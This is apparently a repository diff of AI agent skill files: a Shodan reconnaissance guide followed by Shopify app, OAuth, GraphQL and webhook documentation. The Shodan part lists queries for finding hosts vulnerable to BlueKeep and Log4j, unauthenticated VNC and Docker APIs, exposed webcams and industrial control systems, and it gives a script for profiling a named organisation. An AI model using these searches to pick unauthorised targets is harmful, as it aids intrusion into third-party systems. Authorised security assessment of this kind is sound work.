#### Filtered Search (1 Credit)

```bash
# Product-specific search
shodan search product:mongodb

# Search with multiple filters
shodan search product:nginx country:US city:"New York"
```

#### Count Results

```bash
# Get result count without consuming credits
shodan count openssh
# Output: 23128

shodan count openssh 7
# Output: 219
```

#### Download Results

```bash
# Download 1000 results (default)
shodan download results.json.gz "apache country:US"

# Download a specific number of results
shodan download --limit 5000 results.json.gz "nginx"

# Download all available results
shodan download --limit -1 all_results.json.gz "query"
```

#### Parse Downloaded Data

```bash
# Extract specific fields from downloaded data
shodan parse --fields ip_str,port,hostnames results.json.gz

# Filter by specific criteria
shodan parse --fields location.country_code3,ip_str -f port:22 results.json.gz

# Export to CSV format
shodan parse --fields ip_str,port,org --separator , results.json.gz > results.csv
```
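Downloaded result files are gzip-compressed, newline-delimited JSON: one banner object per line. When `shodan parse` is not flexible enough, the file can be read directly in Python; `parse_banners` below is an illustrative helper (not part of the Shodan CLI), assuming only the documented `ip_str`, `port`, and `product` banner fields:

```python
import gzip
import json

def parse_banners(path):
    """Yield (ip, port, product) tuples from a Shodan download file.

    Shodan exports are newline-delimited JSON compressed with gzip;
    each line holds one service banner.
    """
    with gzip.open(path, "rt", encoding="utf-8") as fh:
        for line in fh:
            line = line.strip()
            if not line:
                continue
            banner = json.loads(line)
            yield banner["ip_str"], banner["port"], banner.get("product", "unknown")
```

For example, `list(parse_banners("results.json.gz"))` gives rows ready for CSV writing or further filtering.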
### 4. Search Filters Reference

#### Network Filters

```
ip:1.2.3.4               # Specific IP address
net:192.168.0.0/24       # Network range (CIDR)
hostname:example.com     # Hostname contains
port:22                  # Specific port
asn:AS15169              # Autonomous System Number
```

#### Geographic Filters

```
country:US               # Two-letter country code
country:"United States"  # Full country name
city:"San Francisco"     # City name
state:CA                 # State/region
postal:94102             # Postal/ZIP code
geo:37.7,-122.4          # Lat/long coordinates
```

#### Organization Filters

```
org:"Google"             # Organization name
isp:"Comcast"            # ISP name
```

#### Service/Product Filters

```
product:nginx                      # Software product
version:1.14.0                     # Software version
os:"Windows Server 2019"           # Operating system
http.title:"Dashboard"             # HTTP page title
http.html:"login"                  # HTML content
http.status:200                    # HTTP status code
ssl.cert.subject.cn:*.example.com  # SSL certificate
ssl:true                           # Has SSL enabled
```

#### Vulnerability Filters

```
vuln:CVE-2019-0708       # Specific CVE
has_vuln:true            # Has any vulnerability
```

#### Screenshot Filters

```
has_screenshot:true      # Has screenshot available
screenshot.label:webcam  # Screenshot type
```
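Filter syntax composes by joining `key:value` tokens with spaces, quoting any value that contains whitespace. A small helper makes that mechanical when building queries programmatically (this function is hypothetical, not part of the shodan package):

```python
def build_query(terms=(), filters=None):
    """Assemble a Shodan query string from free-text terms and a filter dict.

    Values containing whitespace are wrapped in double quotes, matching
    the syntax accepted by the website, CLI, and API.
    """
    parts = list(terms)
    for key, value in (filters or {}).items():
        value = str(value)
        if any(ch.isspace() for ch in value):
            value = f'"{value}"'
        parts.append(f"{key}:{value}")
    return " ".join(parts)
```

For example, `build_query(["nginx"], {"country": "US", "city": "New York"})` returns `nginx country:US city:"New York"`; dotted filter keys such as `ssl.cert.subject.cn` work as plain dict keys.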
### 5. On-Demand Scanning

#### Submit Scan

```bash
# Scan a single IP (1 scan credit per IP)
shodan scan submit 203.0.113.50

# Scan with verbose output (shows scan ID)
shodan scan submit --verbose 203.0.113.50

# Scan and save results
shodan scan submit --filename scan_results.json.gz 203.0.113.50
```

Note: Shodan scans public, internet-facing addresses; private RFC 1918 ranges such as 192.168.0.0/16 are not reachable by its crawlers.

#### Monitor Scan Status

```bash
# List recent scans
shodan scan list

# Check specific scan status
shodan scan status SCAN_ID

# Download scan results later
shodan download --limit -1 results.json.gz scan:SCAN_ID
```

#### Available Scan Protocols

```bash
# List available protocols/modules
shodan scan protocols
```
### 6. Statistics and Analysis

#### Get Search Statistics

```bash
# Default statistics (top 10 countries, orgs)
shodan stats nginx

# Custom facets
shodan stats --facets domain,port,asn --limit 5 nginx

# Save to CSV
shodan stats --facets country,org -O stats.csv apache
```
### 7. Network Monitoring

#### Setup Alerts (Web Interface)

1. Navigate to the Monitor dashboard
2. Add an IP, range, or domain to monitor
3. Configure a notification service (email, Slack, webhook)
4. Select trigger events (new service, vulnerability, etc.)
5. View the dashboard for exposed services
### 8. REST API Usage

#### Direct API Calls

```bash
# Get API info
curl -s "https://api.shodan.io/api-info?key=YOUR_KEY" | jq

# Host lookup
curl -s "https://api.shodan.io/shodan/host/1.1.1.1?key=YOUR_KEY" | jq

# Search query
curl -s "https://api.shodan.io/shodan/host/search?key=YOUR_KEY&query=apache" | jq
```

#### Python Library

```python
import shodan

api = shodan.Shodan('YOUR_API_KEY')

# Search
results = api.search('apache')
print(f'Results found: {results["total"]}')
for result in results['matches']:
    print(f'IP: {result["ip_str"]}')

# Host lookup
host = api.host('1.1.1.1')
print(f'IP: {host["ip_str"]}')
print(f'Organization: {host.get("org", "n/a")}')
for item in host['data']:
    print(f'Port: {item["port"]}')
```
## Quick Reference

### Essential CLI Commands

| Command | Description | Credits |
|---------|-------------|---------|
| `shodan init KEY` | Initialize API key | 0 |
| `shodan info` | Show account info | 0 |
| `shodan myip` | Show your IP | 0 |
| `shodan host IP` | Host details | 0 |
| `shodan count QUERY` | Result count | 0 |
| `shodan search QUERY` | Basic search | 0\* |
| `shodan download FILE QUERY` | Save results | 1/100 results |
| `shodan parse FILE` | Extract data | 0 |
| `shodan stats QUERY` | Statistics | 1 |
| `shodan scan submit IP` | On-demand scan | 1/IP |
| `shodan honeyscore IP` | Honeypot check | 0 |

\*Filters consume 1 credit per query
### Common Search Queries

| Purpose | Query |
|---------|-------|
| Find webcams | `webcam has_screenshot:true` |
| MongoDB databases | `product:mongodb` |
| Redis servers | `product:redis` |
| Elasticsearch | `product:elastic port:9200` |
| Default passwords | `"default password"` |
| Vulnerable RDP | `port:3389 vuln:CVE-2019-0708` |
| Industrial systems | `port:502 modbus` |
| Cisco devices | `product:cisco` |
| Open VNC | `port:5900 authentication disabled` |
| Exposed FTP | `port:21 anonymous` |
| WordPress sites | `http.component:wordpress` |
| Printers | `"HP-ChaiSOE" port:80` |
| Cameras (RTSP) | `port:554 has_screenshot:true` |
| Jenkins servers | `X-Jenkins port:8080` |
| Docker APIs | `port:2375 product:docker` |

### Useful Filter Combinations

| Scenario | Query |
|----------|-------|
| Target org recon | `org:"Company Name"` |
| Domain enumeration | `hostname:example.com` |
| Network range scan | `net:192.168.0.0/24` |
| SSL cert search | `ssl.cert.subject.cn:*.target.com` |
| Vulnerable servers | `vuln:CVE-2021-44228 country:US` |
| Exposed admin panels | `http.title:"admin" port:443` |
| Database exposure | `port:3306,5432,27017,6379` |
### Credit System

| Action | Credit Type | Cost |
|--------|-------------|------|
| Basic search | Query | 0 (no filters) |
| Filtered search | Query | 1 |
| Download 100 results | Query | 1 |
| Generate report | Query | 1 |
| Scan 1 IP | Scan | 1 |
| Network monitoring | Monitored IPs | Depends on plan |
## Constraints and Limitations

### Operational Boundaries

- Rate limited to 1 request per second
- Scan results are not immediate (scans run asynchronously)
- Cannot re-scan the same IP within 24 hours (non-Enterprise)
- Free accounts have limited credits
- Some data requires a paid subscription

### Data Freshness

- Shodan crawls continuously, but data may be days or weeks old
- On-demand scans provide current data but cost credits
- Historical data is available with paid plans

### Legal Requirements

- Only perform reconnaissance on authorized targets
- Passive reconnaissance is generally legal, but verify your jurisdiction
- Active scanning (`scan submit`) requires authorization
- Document all reconnaissance activities
## Examples

### Example 1: Organization Reconnaissance

```bash
# Find all hosts belonging to target organization
shodan search 'org:"Target Company"'

# Get statistics on their infrastructure
shodan stats --facets port,product,country 'org:"Target Company"'

# Download detailed data
shodan download target_data.json.gz 'org:"Target Company"'

# Parse for specific info
shodan parse --fields ip_str,port,product target_data.json.gz
```
### Example 2: Vulnerable Service Discovery

```bash
# Find hosts vulnerable to BlueKeep (RDP CVE)
shodan search 'vuln:CVE-2019-0708 country:US'

# Find exposed Elasticsearch with no auth
shodan search 'product:elastic port:9200 -authentication'

# Find Log4j vulnerable systems
shodan search 'vuln:CVE-2021-44228'
```
### Example 3: IoT Device Discovery

```bash
# Find exposed webcams
shodan search 'webcam has_screenshot:true country:US'

# Find industrial control systems
shodan search 'port:502 product:modbus'

# Find exposed printers
shodan search '"HP-ChaiSOE" port:80'

# Find smart home devices
shodan search 'product:nest'
```
### Example 4: SSL/TLS Certificate Analysis

```bash
# Find hosts with specific SSL cert
shodan search 'ssl.cert.subject.cn:*.example.com'

# Find expired certificates
shodan search 'ssl.cert.expired:true org:"Company"'

# Find self-signed certificates
shodan search 'ssl.cert.issuer.cn:self-signed'
```
### Example 5: Python Automation Script

```python
#!/usr/bin/env python3
import shodan

API_KEY = 'YOUR_API_KEY'
api = shodan.Shodan(API_KEY)

def recon_organization(org_name):
    """Perform reconnaissance on an organization"""
    try:
        # Search for organization
        query = f'org:"{org_name}"'
        results = api.search(query)

        print(f"[*] Found {results['total']} hosts for {org_name}")

        # Collect unique IPs and ports
        hosts = {}
        for result in results['matches']:
            ip = result['ip_str']
            port = result['port']
            product = result.get('product', 'unknown')

            if ip not in hosts:
                hosts[ip] = []
            hosts[ip].append({'port': port, 'product': product})

        # Output findings
        for ip, services in hosts.items():
            print(f"\n[+] {ip}")
            for svc in services:
                print(f"  - {svc['port']}/tcp ({svc['product']})")

        return hosts

    except shodan.APIError as e:
        print(f"Error: {e}")
        return None

if __name__ == '__main__':
    recon_organization("Target Company")
```
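A single `api.search` call only returns the first page of matches (100 per page). The shodan library's `search_cursor(query)` generator pages through the full result set and yields the same banner dicts, so the grouping step can be factored into a pure function and reused either way. A sketch under that assumption:

```python
from collections import defaultdict

def aggregate_services(matches):
    """Group an iterable of Shodan banner dicts into {ip: [(port, product)]}.

    `matches` may be results['matches'] from one api.search() call, or the
    generator returned by api.search_cursor(query), which transparently
    fetches every page (consuming query credits as it goes).
    """
    hosts = defaultdict(list)
    for banner in matches:
        hosts[banner["ip_str"]].append(
            (banner["port"], banner.get("product", "unknown"))
        )
    return dict(hosts)
```

For full coverage, call it as `aggregate_services(api.search_cursor('org:"Target Company"'))`.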
### Example 6: Network Range Assessment

```bash
# Query a public /24 network range
shodan search 'net:198.51.100.0/24'

# Get port distribution
shodan stats --facets port 'net:198.51.100.0/24'

# Find specific vulnerabilities in the range
shodan search 'net:198.51.100.0/24 vuln:CVE-2021-44228'

# Export all data for the range
shodan download network_scan.json.gz 'net:198.51.100.0/24'
```
## Troubleshooting

| Issue | Cause | Solution |
|-------|-------|----------|
| No API Key Configured | Key not initialized | Run `shodan init YOUR_API_KEY` then verify with `shodan info` |
| Query Credits Exhausted | Monthly credits consumed | Use credit-free queries (no filters), wait for reset, or upgrade |
| Host Recently Crawled | Cannot re-scan IP within 24h | Use `shodan host IP` for existing data, or wait 24 hours |
| Rate Limit Exceeded | >1 request/second | Add `time.sleep(1)` between API requests |
| Empty Search Results | Too specific or syntax error | Use quotes for phrases: `'org:"Company Name"'`; broaden criteria |
| Downloaded File Won't Parse | Corrupted or wrong format | Verify with `gunzip -t file.gz`, re-download with `--limit` |
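Rather than sprinkling `time.sleep(1)` calls through a script, the 1 request/second limit can be enforced in one place with a small throttling wrapper. This is an illustrative sketch, not part of the shodan package; the `_clock`/`_sleep` parameters exist only to make it testable:

```python
import time

def throttled(func, min_interval=1.0, _clock=time.monotonic, _sleep=time.sleep):
    """Wrap func so consecutive calls are at least min_interval seconds apart."""
    last_call = [None]  # mutable cell so the closure can update it

    def wrapper(*args, **kwargs):
        now = _clock()
        if last_call[0] is not None:
            wait = min_interval - (now - last_call[0])
            if wait > 0:
                _sleep(wait)
        last_call[0] = _clock()
        return func(*args, **kwargs)

    return wrapper
```

Usage with the Shodan client: `search = throttled(api.search)`, then call `search(query)` freely inside a loop.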
42 skills/shopify-apps/SKILL.md Normal file
@@ -0,0 +1,42 @@
---
name: shopify-apps
description: "Expert patterns for Shopify app development including Remix/React Router apps, embedded apps with App Bridge, webhook handling, GraphQL Admin API, Polaris components, billing, and app extensions. Use when: shopify app, shopify, embedded app, polaris, app bridge."
source: vibeship-spawner-skills (Apache 2.0)
---

# Shopify Apps

## Patterns

### React Router App Setup

Modern Shopify app template with React Router

### Embedded App with App Bridge

Render app embedded in Shopify Admin

### Webhook Handling

Secure webhook processing with HMAC verification
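HMAC verification means computing a SHA-256 HMAC of the raw request body, keyed with the app's client secret, and comparing it in constant time against the base64 value Shopify sends in the `X-Shopify-Hmac-Sha256` header. A framework-agnostic sketch (how you obtain the raw bytes and the secret depends on your stack):

```python
import base64
import hashlib
import hmac

def verify_shopify_webhook(raw_body: bytes, header_hmac: str, secret: str) -> bool:
    """Return True if the webhook body matches the HMAC header.

    raw_body must be the unparsed request bytes; re-serializing parsed
    JSON can change the bytes and break verification.
    """
    digest = hmac.new(secret.encode("utf-8"), raw_body, hashlib.sha256).digest()
    expected = base64.b64encode(digest).decode("utf-8")
    # hmac.compare_digest avoids leaking a timing side channel
    return hmac.compare_digest(expected, header_hmac)
```

Reject the request (401) before doing any processing when this returns False.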
## Anti-Patterns

### ❌ REST API for New Apps

### ❌ Webhook Processing Before Response

### ❌ Polling Instead of Webhooks

## ⚠️ Sharp Edges

| Issue | Severity | Solution |
|-------|----------|----------|
| Webhook delivery timeouts | high | Respond immediately, process asynchronously |
| API rate limiting | high | Check rate limit headers |
| Protected customer data | high | Request protected customer data access |
| Config split between TOML and Dashboard | medium | Use TOML only (recommended) |
| Embedded vs. standalone URL formats | medium | Handle both URL formats |
| REST Admin API is legacy | high | Use GraphQL for all new code |
| Outdated App Bridge versions | high | Use latest App Bridge via script tag |
| Missing GDPR compliance webhooks | high | Implement all GDPR handlers |
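"Respond immediately, process asynchronously" means acknowledging the webhook with a 2xx within Shopify's delivery timeout and doing the real work off the request path. A minimal queue-and-worker sketch (the handler and worker names are illustrative; in production the queue would usually be a job system rather than an in-process `queue.Queue`):

```python
import queue
import threading

webhook_queue = queue.Queue()

def handle_webhook(payload):
    """Request handler: enqueue the payload and acknowledge immediately."""
    webhook_queue.put(payload)
    return 200  # respond 2xx fast; Shopify retries slow or failed deliveries

def worker(process, stop_event):
    """Background worker: drain the queue and do the slow processing."""
    while not stop_event.is_set():
        try:
            payload = webhook_queue.get(timeout=0.1)
        except queue.Empty:
            continue
        process(payload)
        webhook_queue.task_done()
```

The worker runs in a thread (`threading.Thread(target=worker, args=(process_fn, stop_event))`), keeping the HTTP response independent of processing time.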
60 skills/shopify-development/README.md Normal file
@@ -0,0 +1,60 @@
# Shopify Development Skill

Comprehensive skill for building on the Shopify platform: apps, extensions, themes, and API integrations.

## Features

- **App Development** - OAuth authentication, GraphQL Admin API, webhooks, billing integration
- **UI Extensions** - Checkout, Admin, POS customizations with Polaris components
- **Theme Development** - Liquid templating, sections, snippets
- **Shopify Functions** - Custom discounts, payment, delivery rules

## Structure

```
shopify-development/
├── SKILL.md                  # Main skill file (AI-optimized)
├── README.md                 # This file
├── references/
│   ├── app-development.md    # OAuth, API, webhooks, billing
│   ├── extensions.md         # UI extensions, Functions
│   └── themes.md             # Liquid, theme architecture
└── scripts/
    ├── shopify_init.py       # Interactive project scaffolding
    ├── shopify_graphql.py    # GraphQL utilities & templates
    └── tests/                # Unit tests
```

## Validated GraphQL

All GraphQL queries and mutations in this skill have been validated against the Shopify Admin API 2026-01 schema using the official Shopify MCP.

## Quick Start

```bash
# Install Shopify CLI
npm install -g @shopify/cli@latest

# Create new app
shopify app init

# Start development
shopify app dev
```

## Usage Triggers

This skill activates when the user mentions:

- "shopify app", "shopify extension", "shopify theme"
- "checkout extension", "admin extension", "POS extension"
- "liquid template", "polaris", "shopify graphql"
- "shopify webhook", "shopify billing", "metafields"

## API Version

Current: **2026-01** (quarterly releases with 12-month support)

## License

MIT
366 skills/shopify-development/SKILL.md Normal file
@@ -0,0 +1,366 @@
---
name: shopify-development
description: |
  Build Shopify apps, extensions, themes using GraphQL Admin API, Shopify CLI, Polaris UI, and Liquid.
  TRIGGER: "shopify", "shopify app", "checkout extension", "admin extension", "POS extension",
  "shopify theme", "liquid template", "polaris", "shopify graphql", "shopify webhook",
  "shopify billing", "app subscription", "metafields", "shopify functions"
---

# Shopify Development Skill

Use this skill when the user asks about:

- Building Shopify apps or extensions
- Creating checkout/admin/POS UI customizations
- Developing themes with Liquid templating
- Integrating with Shopify GraphQL or REST APIs
- Implementing webhooks or billing
- Working with metafields or Shopify Functions

---

## ROUTING: What to Build

**IF user wants to integrate external services OR build merchant tools OR charge for features:**
→ Build an **App** (see `references/app-development.md`)

**IF user wants to customize checkout OR add admin UI OR create POS actions OR implement discount rules:**
→ Build an **Extension** (see `references/extensions.md`)

**IF user wants to customize storefront design OR modify product/collection pages:**
→ Build a **Theme** (see `references/themes.md`)

**IF user needs both backend logic AND storefront UI:**
→ Build **App + Theme Extension** combination

---
## Shopify CLI Commands

Install CLI:

```bash
npm install -g @shopify/cli@latest
```

Create and run app:

```bash
shopify app init      # Create new app
shopify app dev       # Start dev server with tunnel
shopify app deploy    # Build and upload to Shopify
```

Generate extension:

```bash
shopify app generate extension --type checkout_ui_extension
shopify app generate extension --type admin_action
shopify app generate extension --type admin_block
shopify app generate extension --type pos_ui_extension
shopify app generate extension --type function
```

Theme development:

```bash
shopify theme init                 # Create new theme
shopify theme dev                  # Start local preview at localhost:9292
shopify theme pull --live          # Pull live theme
shopify theme push --development   # Push to dev theme
```

---
## Access Scopes

Configure in `shopify.app.toml`:

```toml
[access_scopes]
scopes = "read_products,write_products,read_orders,write_orders,read_customers"
```

Common scopes:

- `read_products`, `write_products` - Product catalog access
- `read_orders`, `write_orders` - Order management
- `read_customers`, `write_customers` - Customer data
- `read_inventory`, `write_inventory` - Stock levels
- `read_fulfillments`, `write_fulfillments` - Order fulfillment

---
## GraphQL Patterns (Validated against API 2026-01)

### Query Products

```graphql
query GetProducts($first: Int!, $query: String) {
  products(first: $first, query: $query) {
    edges {
      node {
        id
        title
        handle
        status
        variants(first: 5) {
          edges {
            node {
              id
              price
              inventoryQuantity
            }
          }
        }
      }
    }
    pageInfo {
      hasNextPage
      endCursor
    }
  }
}
```

### Query Orders

```graphql
query GetOrders($first: Int!) {
  orders(first: $first) {
    edges {
      node {
        id
        name
        createdAt
        displayFinancialStatus
        totalPriceSet {
          shopMoney {
            amount
            currencyCode
          }
        }
      }
    }
  }
}
```

### Set Metafields

```graphql
mutation SetMetafields($metafields: [MetafieldsSetInput!]!) {
  metafieldsSet(metafields: $metafields) {
    metafields {
      id
      namespace
      key
      value
    }
    userErrors {
      field
      message
    }
  }
}
```

Variables example:

```json
{
  "metafields": [
    {
      "ownerId": "gid://shopify/Product/123",
      "namespace": "custom",
      "key": "care_instructions",
      "value": "Handle with care",
      "type": "single_line_text_field"
    }
  ]
}
```

---
## Checkout Extension Example

```tsx
import { useEffect, useState } from "react";
import {
  reactExtension,
  BlockStack,
  TextField,
  Checkbox,
  useApplyAttributeChange,
} from "@shopify/ui-extensions-react/checkout";

export default reactExtension("purchase.checkout.block.render", () => (
  <GiftMessage />
));

function GiftMessage() {
  const [isGift, setIsGift] = useState(false);
  const [message, setMessage] = useState("");
  const applyAttributeChange = useApplyAttributeChange();

  useEffect(() => {
    if (isGift && message) {
      applyAttributeChange({
        type: "updateAttribute",
        key: "gift_message",
        value: message,
      });
    }
  }, [isGift, message]);

  return (
    <BlockStack spacing="loose">
      <Checkbox checked={isGift} onChange={setIsGift}>
        This is a gift
      </Checkbox>
      {isGift && (
        <TextField
          label="Gift Message"
          value={message}
          onChange={setMessage}
          multiline={3}
        />
      )}
    </BlockStack>
  );
}
```

---
## Liquid Template Example

```liquid
{% comment %} Product Card Snippet {% endcomment %}
<div class="product-card">
  <a href="{{ product.url }}">
    {% if product.featured_image %}
      <img
        src="{{ product.featured_image | img_url: 'medium' }}"
        alt="{{ product.title | escape }}"
        loading="lazy"
      >
    {% endif %}
    <h3>{{ product.title }}</h3>
    <p class="price">{{ product.price | money }}</p>
    {% if product.compare_at_price > product.price %}
      <p class="sale-badge">Sale</p>
    {% endif %}
  </a>
</div>
```

---
## Webhook Configuration

In `shopify.app.toml`:

```toml
[webhooks]
api_version = "2026-01"

[[webhooks.subscriptions]]
topics = ["orders/create", "orders/updated"]
uri = "/webhooks/orders"

[[webhooks.subscriptions]]
topics = ["products/update"]
uri = "/webhooks/products"

# GDPR mandatory webhooks (required for app approval)
[webhooks.privacy_compliance]
customer_data_request_url = "/webhooks/gdpr/data-request"
customer_deletion_url = "/webhooks/gdpr/customer-deletion"
shop_deletion_url = "/webhooks/gdpr/shop-deletion"
```

---
## Best Practices

### API Usage

- Use GraphQL over REST for new development
- Request only fields you need (reduces query cost)
- Implement cursor-based pagination with `pageInfo.endCursor`
- Use bulk operations for processing more than 250 items
- Handle rate limits with exponential backoff
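Cursor-based pagination loops on `pageInfo.hasNextPage`, feeding `endCursor` back as the `after` argument on the next request. A transport-agnostic sketch, assuming a query that declares `$after: String` and passes it to the connection; `run_query` stands in for whatever GraphQL client the app uses:

```python
def paginate(run_query, query, variables=None, page_size=50):
    """Yield nodes from a connection field using pageInfo/endCursor.

    run_query(query, variables) must return the parsed `data` payload with
    a single top-level connection field (e.g. "products").
    """
    variables = dict(variables or {}, first=page_size)
    cursor = None
    while True:
        page = run_query(query, dict(variables, after=cursor))
        connection = next(iter(page.values()))  # e.g. data["products"]
        for edge in connection["edges"]:
            yield edge["node"]
        info = connection["pageInfo"]
        if not info["hasNextPage"]:
            return
        cursor = info["endCursor"]
```

Because it is a generator, callers can stop early without fetching remaining pages.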
### Security

- Store API credentials in environment variables
- Always verify webhook HMAC signatures before processing
- Validate OAuth state parameter to prevent CSRF
- Request minimal access scopes
- Use session tokens for embedded apps

### Performance

- Cache API responses when data doesn't change frequently
- Use lazy loading in extensions
- Optimize images in themes using `img_url` filter
- Monitor GraphQL query costs via response headers

---
## Troubleshooting

**IF you see rate limit errors:**
→ Implement exponential backoff retry logic
→ Switch to bulk operations for large datasets
→ Monitor `X-Shopify-Shop-Api-Call-Limit` header
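Exponential backoff retries a throttled call with a delay that doubles after each failure. A sketch of the retry loop (the `Throttled` exception is a stand-in for whatever error your GraphQL client raises on rate limiting; `_sleep` is injectable so the logic is testable):

```python
import time

class Throttled(Exception):
    """Stand-in for a client-specific rate-limit error."""

def with_backoff(call, retries=5, base_delay=0.5, _sleep=time.sleep):
    """Run call(), retrying on Throttled with delays 0.5s, 1s, 2s, ..."""
    for attempt in range(retries):
        try:
            return call()
        except Throttled:
            if attempt == retries - 1:
                raise  # out of retries: surface the error
            _sleep(base_delay * (2 ** attempt))
```

In practice, catch the throttle error your client actually raises and consider adding jitter so many workers don't retry in lockstep.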
**IF authentication fails:**
→ Verify the access token is still valid
→ Check that all required scopes were granted
→ Ensure OAuth flow completed successfully

**IF extension is not appearing:**
→ Verify the extension target is correct
→ Check that extension is published via `shopify app deploy`
→ Confirm the app is installed on the test store

**IF webhook is not receiving events:**
→ Verify the webhook URL is publicly accessible
→ Check HMAC signature validation logic
→ Review webhook logs in Partner Dashboard

**IF GraphQL query fails:**
→ Validate query against schema (use GraphiQL explorer)
→ Check for deprecated fields in error message
→ Verify you have required access scopes

---
## Reference Files

For detailed implementation guides, read these files:

- `references/app-development.md` - OAuth authentication flow, GraphQL mutations for products/orders/billing, webhook handlers, billing API integration
- `references/extensions.md` - Checkout UI components, Admin UI extensions, POS extensions, Shopify Functions for discounts/payment/delivery
- `references/themes.md` - Liquid syntax reference, theme directory structure, sections and snippets, common patterns

---

## Scripts

- `scripts/shopify_init.py` - Interactive project scaffolding. Run: `python scripts/shopify_init.py`
- `scripts/shopify_graphql.py` - GraphQL utilities with query templates, pagination, rate limiting. Import: `from shopify_graphql import ShopifyGraphQL`

---
## Official Documentation Links

- Shopify Developer Docs: https://shopify.dev/docs
- GraphQL Admin API Reference: https://shopify.dev/docs/api/admin-graphql
- Shopify CLI Reference: https://shopify.dev/docs/api/shopify-cli
- Polaris Design System: https://polaris.shopify.com

API Version: 2026-01 (quarterly releases, 12-month deprecation window)
578 skills/shopify-development/references/app-development.md Normal file
@@ -0,0 +1,578 @@
# App Development Reference

Guide for building Shopify apps with OAuth, GraphQL/REST APIs, webhooks, and billing.

## OAuth Authentication

### OAuth 2.0 Flow

**1. Redirect to Authorization URL:**

```
https://{shop}.myshopify.com/admin/oauth/authorize?
  client_id={api_key}&
  scope={scopes}&
  redirect_uri={redirect_uri}&
  state={nonce}
```
**2. Handle Callback:**

```javascript
app.get("/auth/callback", async (req, res) => {
  const { code, shop, state } = req.query;

  // Verify state to prevent CSRF
  if (state !== storedState) {
    return res.status(403).send("Invalid state");
  }

  // Exchange code for access token
  const accessToken = await exchangeCodeForToken(shop, code);

  // Store token securely
  await storeAccessToken(shop, accessToken);

  res.redirect(`https://${shop}/admin/apps/${appHandle}`);
});
```

**3. Exchange Code for Token:**

```javascript
async function exchangeCodeForToken(shop, code) {
  const response = await fetch(`https://${shop}/admin/oauth/access_token`, {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({
      client_id: process.env.SHOPIFY_API_KEY,
      client_secret: process.env.SHOPIFY_API_SECRET,
      code,
    }),
  });

  const { access_token } = await response.json();
  return access_token;
}
```
### Access Scopes

**Common Scopes:**

- `read_products`, `write_products` - Product catalog
- `read_orders`, `write_orders` - Order management
- `read_customers`, `write_customers` - Customer data
- `read_inventory`, `write_inventory` - Stock levels
- `read_fulfillments`, `write_fulfillments` - Order fulfillment
- `read_shipping`, `write_shipping` - Shipping rates
- `read_analytics` - Store analytics
- `read_checkouts`, `write_checkouts` - Checkout data

Full list: https://shopify.dev/api/usage/access-scopes
### Session Tokens (Embedded Apps)

For embedded apps using App Bridge:

```javascript
import { getSessionToken } from '@shopify/app-bridge/utilities';

async function authenticatedFetch(url, options = {}) {
  const app = createApp({ ... });
  const token = await getSessionToken(app);

  return fetch(url, {
    ...options,
    headers: {
      ...options.headers,
      'Authorization': `Bearer ${token}`
    }
  });
}
```
## GraphQL Admin API

### Making Requests

```javascript
async function graphqlRequest(shop, accessToken, query, variables = {}) {
  const response = await fetch(
    `https://${shop}/admin/api/2026-01/graphql.json`,
    {
      method: "POST",
      headers: {
        "X-Shopify-Access-Token": accessToken,
        "Content-Type": "application/json",
      },
      body: JSON.stringify({ query, variables }),
    },
  );

  const data = await response.json();

  if (data.errors) {
    throw new Error(`GraphQL errors: ${JSON.stringify(data.errors)}`);
  }

  return data.data;
}
```
### Product Operations
|
||||
|
||||
**Create Product:**
|
||||
|
||||
```graphql
|
||||
mutation CreateProduct($input: ProductInput!) {
|
||||
productCreate(input: $input) {
|
||||
product {
|
||||
id
|
||||
title
|
||||
handle
|
||||
}
|
||||
userErrors {
|
||||
field
|
||||
message
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
Variables:
|
||||
|
||||
```json
|
||||
{
|
||||
"input": {
|
||||
"title": "New Product",
|
||||
"productType": "Apparel",
|
||||
"vendor": "Brand",
|
||||
"status": "ACTIVE",
|
||||
"variants": [
|
||||
{ "price": "29.99", "sku": "SKU-001", "inventoryQuantity": 100 }
|
||||
]
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
**Update Product:**
|
||||
|
||||
```graphql
|
||||
mutation UpdateProduct($input: ProductInput!) {
|
||||
productUpdate(input: $input) {
|
||||
product {
|
||||
id
|
||||
title
|
||||
}
|
||||
userErrors {
|
||||
field
|
||||
message
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
**Query Products:**
|
||||
|
||||
```graphql
|
||||
query GetProducts($first: Int!, $query: String) {
|
||||
products(first: $first, query: $query) {
|
||||
edges {
|
||||
node {
|
||||
id
|
||||
title
|
||||
status
|
||||
variants(first: 5) {
|
||||
edges {
|
||||
node {
|
||||
id
|
||||
price
|
||||
inventoryQuantity
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
pageInfo {
|
||||
hasNextPage
|
||||
endCursor
|
||||
}
|
||||
}
|
||||
}
|
||||
```
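The `pageInfo` fields drive cursor pagination: pass `endCursor` back as an `after` variable until `hasNextPage` is false. A sketch of the loop, assuming a `request(variables)` helper in the spirit of `graphqlRequest` above that resolves to the `products` connection payload:

```javascript
// Drain a cursor-paginated connection. `request` is any function that
// takes variables and resolves to the connection (edges + pageInfo).
async function fetchAllProducts(request, pageSize = 50) {
  const products = [];
  let cursor = null;

  while (true) {
    const page = await request({ first: pageSize, after: cursor });
    for (const edge of page.edges) products.push(edge.node);
    if (!page.pageInfo.hasNextPage) break;
    cursor = page.pageInfo.endCursor; // resume after the last node seen
  }

  return products;
}
```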

### Order Operations

**Query Orders:**

```graphql
query GetOrders($first: Int!) {
  orders(first: $first) {
    edges {
      node {
        id
        name
        createdAt
        displayFinancialStatus
        totalPriceSet {
          shopMoney {
            amount
            currencyCode
          }
        }
        customer {
          email
          firstName
          lastName
        }
      }
    }
  }
}
```

**Fulfill Order:**

```graphql
mutation FulfillOrder($fulfillment: FulfillmentInput!) {
  fulfillmentCreate(fulfillment: $fulfillment) {
    fulfillment {
      id
      status
      trackingInfo {
        number
        url
      }
    }
    userErrors {
      field
      message
    }
  }
}
```

## Webhooks

### Configuration

In `shopify.app.toml`:

```toml
[webhooks]
api_version = "2025-01"

[[webhooks.subscriptions]]
topics = ["orders/create"]
uri = "/webhooks/orders/create"

[[webhooks.subscriptions]]
topics = ["products/update"]
uri = "/webhooks/products/update"

[[webhooks.subscriptions]]
topics = ["app/uninstalled"]
uri = "/webhooks/app/uninstalled"

# GDPR mandatory webhooks
[webhooks.privacy_compliance]
customer_data_request_url = "/webhooks/gdpr/data-request"
customer_deletion_url = "/webhooks/gdpr/customer-deletion"
